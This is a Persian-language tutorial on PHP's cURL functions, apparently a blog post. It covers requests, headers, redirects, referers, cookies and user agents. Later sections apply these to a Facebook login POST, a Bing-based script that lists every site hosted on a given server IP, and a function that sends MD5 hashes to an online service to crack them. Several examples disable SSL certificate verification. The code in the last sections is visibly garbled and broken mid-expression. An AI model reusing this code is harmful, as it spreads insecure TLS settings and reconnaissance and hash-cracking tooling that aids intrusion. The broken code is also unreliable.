درود دوستان عزیز با آموزش کار باد توابع CURL در PHP در خدمتتون هستم .در اینجا تلاش می کنم که آموزش هارو از مبتدی تا پیشرفته آماده کنم و قرار بدم . در واقع Curl یک بسته به صورت اکستنش هست که روی php نصب میشه.اگر در ویندوز هستید این بسته با نام php_curl.dll و اگر در لینوکس هستید با نام curl.so موجود می باشد .از طریق php.ini می تونید این بسته رو فعال کنید که بتونید ازش استفاده کنید .در آخر هم سعی می کنم چند برنامه کاربردی بنویسیم.سپاس در واقع CURL یک اکستنشن پر سرعت و قوی موجود در php است که با استفاده از اون می تونیم اطلاعات رو مانند یک مرورگر بفرستیم و بگیرم , تغییرات درونش بدیم , فیلتر کنم و .... .با استفاده از CURL میشه برنامه هایی مثل اسکنر ها و اکسپلویت ها و ... بنویسیم .می تونم بگم که درواقع CURL 3 بخش عمده و اصلی داره .1 – تعریف و مقدار دهی اولیه initialize2 – بدنه curl که شامل اپشن ها و فیلتر ها و ... میشه3 – بستن و اتمام CURL که هر یک رو به صورت مفصل توضیح خواهم داد .نکته : برای آموزش CURL باید php رو بلد باشد ;)خب حالا بریم سراغ کد نویسی . خب برای مقدار دهی اولیه از تابع curl_init() استفاده میشهاین تابع یک کد منبع رو بر میگردونهو می تونه آدرس لینکی که قرار هست باهاش رو کار کنیم بگیره یعنی این آرگومان اختیاری هست و میتونه چیزی داخلش نباشهمثال :$ch = curl_init();Or$ch = curl_init(“http://google.com”);هر دو درست هست .قسمت بدنه که شامل آپشن های curl می باشه با تابع curl_setopt(resoure,option,value) صورت میگیریدcurl_setopt() 3 پارامتر رو دریافت میکنهپارامتر اول کد منبعی که توسط تابع curl_init() ساخته شدهپارامتر دوم آپشن مورد نظرو پارامتر سوم مقداربرای مثال :$ch = curl_init("http://google.com");curl_setopt($ch,CURLOPT_HEADER,1);که ما در اینجا بهش میگیم که ما هدر لینک رو میخوایم دریافت کنیم . مقدار 1 رو بهش دادیمخب بعد از اینکه آپشن های مورد نظر اضافه شد باید برنامه رو اجرا کنیم که برای اجرای curl از تابعcurl_exec(resource) استفاده میشه .این تابع کد منبع رو گرفته و آپشن هاشو اجرا میکنه و همچنین موارد مورد نیاز رو بر می گردونهبرای مثال :$ch = curl_init("http://google.com");curl_setopt($ch,CURLOPT_HEADER,1);$result = curl_exec($ch);کد بالا درخواست به سایت گوگل می فرسته و هدر هار میگیره و میریزه توی متغییر $resultحال اگر echo $result بنویسیم میتونیم هدر رو مشاهده کنیم .مر حله آخر هم اتمام کار curl است که با curl_close(resource) انجام میگیرهاین تابع کد منبع رو بع عنوان آرگومان دریافت میکنه و به اون خاتمه میده .خب اگر امتحان کرده باشید اگر کد بالا رو به صورت زیر هم می نوشتیم باز هم همون نتیجه رو می داد$ch = curl_init("http://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1); curl_exec($ch);curl_close($ch);اما چرا ؟ دلیلش همون آپشن های موجود در curl هست که باید رعایت کنید.اگر می خواهید این اتفاق نیوفته باید مقدار CURLOPT_RETURNTRANSFER را در آپشن true قرار بدید . اینطور خروجی به صورت رشته در میاد به جای اینکه مستقیم در خروجی شما ظاهر بشه.پس کد بالا رو به کد زیر تغییر می دیم$ch = curl_init("http://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$result = curl_exec($ch);curl_close($ch);حال اگر کد بالا رو اجرا کنید خرجی صفحه سفید هست . دلیلش هم اینه که دیگه مقدار بازگشی به صورت رشته شده و داخل متغییر$result ریخته شده و حالا اگر مایل باشید روی صفحه نمایش نشان بدید باید اونو echo کنید.کد بالا رو اگر echo کنید خرجی شما علاوه بر صفحه کامل سایت هدر هم بهتون نشون میده یعنی کد بالا به ما میگه هم مقدار بازگشتی رو به صورت رشته برگردون و هم هدر سایت رو ضمیمه کن .ولی شاید شما فقط بخواهید هدر سایت رو ببینید و نیازی به محتوای اون نداشه باشید اونوقت چه باید کرد ؟خب باید از آپشن CURLOPT_NOBODY کمک بگیرید . اگر مقدار این آپشن رو true قرار بدید باعث میشه دیگه صفحه سایت (بدنه سایت) لود و بازگردانده نشود. به کد زیر توجه کنید$ch = curl_init("http://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_NOBODY,1);$result = curl_exec($ch);echo $result;curl_close($ch);اگر کد بالا رو اجرا کنید خروجی شبیه خروجی زیر مشاهده می کنیدHTTP/1.1 200 OK Date: Sun, 02 Aug 2015 08:47:45 GMT Server: Apache X-Powered-By: PHP/5.3.29 Cache-Control: private Pragma: private Set-Cookie: bb_lastvisit=1438505265; expires=Mon, 01-Aug-2016 08:47:45 GMT; path=/cc/ Set-Cookie: bb_lastactivity=0; expires=Mon, 01-Aug-2016 08:47:45 GMT; path=/cc/ Connection: close Content-Type: text/html; charset=UTF-8 نکته: خروجی بالا حاصل از اجرای کد بر روی یک دامنه دیگه است و فقط نکته قابل توجه این هست که هدر رو مشاهده می کنید.این همون چیزی هست که مثلا برای ادیمن فایندر ها و یا اسکنر ها استفاده می شود (برای برخی اهداف از این روش استفاده می شود و چون بحث ما در مورد اسکنر ها نیست توضیح بیشتر نمیدم)خب کد بالا یعنی چه ؟ یعنی آقای curl برو به سایت ۱- هدرش رو برام بیار ۲- مقدار بازگشتیت به صورت رشته باشه و مستقیم توی خروجی من چاپ نکن ۳ – بدنه سایت رو بهش نیاز ندارم و برام لود نکناگر از echo $result; استفاده نمی کردم خروجی چاپ نمیشد چون مقدار بازگشتی الان توی اون متغییر هست و هر کاری که با رشته های دیگه میشه کرد با اینم میشه انجام داد.خب اگر دقت کرده باشید سایت ما با http:// شروع می شد اگر کد بالا رو با سایتی که https:// هست اجرا کنید با کمال تعجب در خرجی چیزی نمی بینید.برای اجرای سایت های دارای https:// باید از ۲ آپشن CURLOPT_SSL_VERIFYPEER و CURLOPT_SSL_VERIFYHOST کمک بگیریم.در واقع CURLOPT_SSL_VERIFYHOST اگر مقدار ۱ رو بدیم بهش فقط گواهی ssl رو چک میکنه و اگر ۲ رو بدیم هم گواهی رو چک میکنه و هم چک میکنه که بانام میزبان منطبق باشه.(اگر برای قسمت مهمی استفاده می کنید این گزینه رو ۲ بزارید)CURLOPT_SSL_VERIFYPEER اگرfalse باشه برای گواهی تاییده نمی گیرهخب چون بحث ما در باره نحوه کارکرد این هاست فقط در همین حد اشاره می کنیم و برای اطلاعات بیشتر درمورد این ۲ آپشن به سایت php.net رجوع کنید.خب حال کد بالا که برای http:// بود رو به کد زیر تغییر می دیم$ch = curl_init("https://google.com");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_NOBODY,1);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$result = curl_exec($ch);echo $result;curl_close($ch);حال اگر کد بالا رو اجرا کنید خرجی شبیه زیر خواهید داشت.HTTP/1.1 301 Moved Permanently Location: https://www.google.com/ Content-Type: text/html; charset=UTF-8 Date: Sun, 02 Aug 2015 09:00:33 GMT Expires: Tue, 01 Sep 2015 09:00:33 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 220 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Alternate-Protocol: 443:quic,p=1 خب حالا به کد زیر توجه کنید.$ch = curl_init("https://google.com");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$result = curl_exec($ch);echo $result;curl_close($ch);اگر کد بالا رو اجرا کنید خرجی شبیه خروجی زیر خواهید داشتHTTP/1.1 301 Moved Permanently Location: https://www.google.com/ Content-Type: text/html; charset=UTF-8 Date: Sun, 02 Aug 2015 09:09:49 GMT Expires: Tue, 01 Sep 2015 09:09:49 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 220 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Alternate-Protocol: 443:quic,p=1 301 MovedThe document has moved here. همانطور که میبینید صفحه سایت گوگل رو برای ما باز نکرد و دلیلش هم همون ریدارکتی بود که با هدر داشت انجام می شد. برای رفع مشکل از آپشن CURLOPT_FOLLOWLOCATION کمک می گیریماگر مقدار این آپشن true باشه هر تعداد ریدایرکت وجود داشته باشه curl اون هارو دنبال میکنه.پس برای مشاهده صفحه اول گوگل باید کد بالا رو به کد زیر تغییر بدیم$ch = curl_init("https://google.com");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);$result = curl_exec($ch);echo $result;curl_close($ch);با اجرای کد بالا صفحه اول گوگل قابل مشاهده هست. ( nobody رو از آپشن برداشتم که بتونم بدنه سایت رو ببینم)حال اگر مایل باشید یک تعداد خواص ریدایرکت رو دنبال کنید باید CURLOPT_MAXREDIRS رو هم مقدار دهی کنید.برای مثال به کد زیر توجه کنید$ch = curl_init("https://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_MAXREDIRS,3);$result = curl_exec($ch);echo $result;curl_close($ch);حال اگر در کد بالا سایت مورد نظر ۴ بار ریدایرکت انجام بده خروجی شما سفید خواهد بود (چون شما در curl_setopt($ch,CURLOPT_MAXREDIRS,3); گفتید حداکثر ۳ بار لینک هارو دنبال کن)برای رفع مشکل و مشاهده کامل سایت مورد نظر باید یکی از ۲ کد زیر را بنویسید$ch = curl_init("https://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_MAXREDIRS,4);$result = curl_exec($ch);echo $result;curl_close($ch);و یا$ch = curl_init("https://virgool.io/@alirezamn93");curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);$result = curl_exec($ch);echo $result;curl_close($ch);خب برخی از سایت ها لینک ارجاع سایت رو هم نگاه می کنند (مثلا برای صفحه ورود لینک ارجاع رو چک می کنند) وقتی می بینید از یک سایت دیگه لینک اومده نشانگر یک عملیات غیر عادی میشند و اجرا ورود رو نمی دهند (این یکی از روش ها برای جلوگیری هست) برای رفع این مشکل 3 روش وجود دارد روش اول استفاده از CURLOPT_AUTOREFERER هست . اگر مقدار true رو بدید فیلد Referer شما به صورت اتوماتیک برابر با سایتی میشه که اونو دنبال می کنید.curl_setopt($ch,CURLOPT_AUTOREFERER,1)روش دوم اگر مایلید خودتون دستی رف لینک بدید باید از آپشن CURLOPT_REFERER استفاده کنید مانند قطعه کد زیرcurl_setopt($ch,CURLOPT_REFERER,"http://www.google.com.com/")روش سوم استفاده از آپشن CURLOPT_HTTPHEADER هست . (کمی جلوتر کامل این دستور رو توضیح میدم)خب خیلی وقت ها پیش میاد که شما برای کار با یک سایت (ورود یا پرس و جو کردن و یا …) نیاز به کوکی دارید.خب آپشن CURLOPT_COOKIESESSION اگر true قرار بدید تمامی کوکی یا سشن های قبلی رو ایگنور میکنه به صورت پیشفرض کوکی و سشن ها ذخیره و اجرا می شوند.آپشن CURLOPT_COOKIE می تونید خودتون کوکی بدید بهش که با اون کوکی اجرا بشه .و آپشن CURLOPT_COOKIEFILE که آدرس فایل ذخیره کوکی ها هست اگر رشته خالی بدید بهش هیچ کوکی لود نمیشه ولی ذخیره می شوند.خب برخی از سایت ها مدل مرورگر هم چک می کنند (حالا برای یک سری کارا یا استایل و...) برای دادن این مشخصات می توانید از آپشن CURLOPT_USERAGENT استفاده کنید. به قطعه کد زیر توجه کنیدcurl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"])و یاcurl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13")دیگه بستگی به خودتون و سایت مورد نظر داره که چکار کنید.خب شاید بعضی از سایت هارو مثل فیس بوک با این روش باز کرده باشید و بهتون اررو مبنی بر غیرفعال بودن کوکی بده . برای کار باکوکی هم می تونید از آپشن های موجود استفاده کنید (بالا گفتم)به قطعه کد زیر توجه کنید: $ch = curl_init("https://www.facebook.com/login.php?login_attempt=1"); // curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_AUTOREFERER,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_ENCODING, 'UTF-8'); curl_setopt($ch,CURLOPT_POSTFIELDS,$fields); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); curl_setopt($ch,CURLOPT_REFERER,"https://www.facebook.com/"); $cookie_file = "cookie1.txt"; curl_setopt($ch, CURLOPT_COOKIESESSION, true); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file); curl_exec($ch); curl_close($ch);(چیزایی که یاد ندادم رو بعد توی آموزش یاد میگیرید فقط خواستم نحوه کارش رو ببینید)خب اگر هم می خواید کوکی ست کنید اپشن CURLOPT_COOKIE رو مقدار دهی کنیدبرای مثال :$cookie = 'PHPSESSID=' . $_COOKIE['PHPSESSID'] . '; path=/'; curl_setopt( $ch, CURLOPT_COOKIE, $cookie ); خب حالا که یک سری ابزار ها رو یاد گرفتیم نظرتون چیه سایت های رو یک سرور با برنامه در بیاریم ؟برای این کار خیلی روش وجود داره یکی از روش ها استفاده از bing.com هست.اگر در سایت bing.com آی پی یک سرور رو وارد کنیم مثلا بنویسیم ip:192.168.1.1 سایت های سرورو بهمون نشون میده (احتمالن اونایی که ایندکس شدن) خب به کد زیرتوجه کنید:$ip = "193.252.114.13";$cnt=1;$nextpage=true;while($nextpage==true){ if($cnt==1) $url="http://www.bing.com/search?q=ip%3A$ip&qs=n&form=QBRE&pq=ip%3A$ip&sc=0-0&sp=-1&sk="; else $url="http://www.bing.com/search?q=ip%3a$ip&qs=n&pq=ip%3a$ip&sc=0-0&sp=-1&sk=&first=$cnt&FORM=PERE"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_COOKIE,'_FP=EM=6; _FS=NU=1; _SS=SID=DE0C67FE74C54DA18A336359D03BCFB3&nhIm=40-; MUID=1BF9890C2B01688F0ED78C942A106831; MUIDB=1BF9890C2B01688F0ED78C942A106831; SRCHD=SM=1&MS=3115188&D=3115188&AF=NOFORM; SRCHUID=V=2&GUID=2A6B69000E9745D9A1B8C86F2BCB341D; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20131203;'); $result=curl_exec($ch); $myPattern = "#(.*?)/","",$find[1]); print_r($urls); } if(preg_match("/class\=\"sb_pagN\"/",$result)) $cnt+=10; else $nextpage=false;}خب من رفتم توی bing.com عبارت ip: 193.252.114.13 سرچ کردم . لینک رو یاداشت کردم$url="http://www.bing.com/search?q=ip:193.252.114.13&qs=n&form=QBRE&pq=ip: 193.252.114.13&sc=0-0&sp=-1&sk=بعد رفتم صفحات دیگه که اینطوری بودن$url="http://www.bing.com/search?q=ip:193.252.114.13&qs=n&pq=ip:193.252.114.13&sc=0-0&sp=-1&sk=&first=$cnt&FORM=PERE";خب حالا باید یه چیزی باشه که بفهمم کی تموم میشه سایت ها برای همین رفتم صفحه آخر دنبال یه چیزی که اینجا باشه و توی بقیه صفحه ها نباشه . دیدم توی همه صفحات class="sb_pagN" هست به جز صفحه آخر پس از این برای اتمام کد کمک گرفتم if(preg_match("/class\=\"sb_pagN\"/",$result)) $cnt+=10; else $nextpage=false;خب دیدی که با یک برنامه ساده تونستم سایت های روی سرور رو دربیارم.خودتون برنامه رو توسعه بدید و پیشرفته ترش کنید.$myPattern = "#(.*?)hash is not valid
"; } }else { echo " "; } function md5decryption_com($hash) { $ch = curl_init("md5decryption.com/"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch,CURLOPT_AUTOREFERER,1); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,array("hash"=>"$hash","submit"=>"Decrypt It!")); $result = curl_exec($ch); curl_close($ch); if(preg_match("/Decrypted Text: <\/b>(.*)<\/font>/",$result,$find)) return $find[1]; else return "regex not found"; }می تونید با خلاقیت خودتون پیشرفته تر و بهترش کنید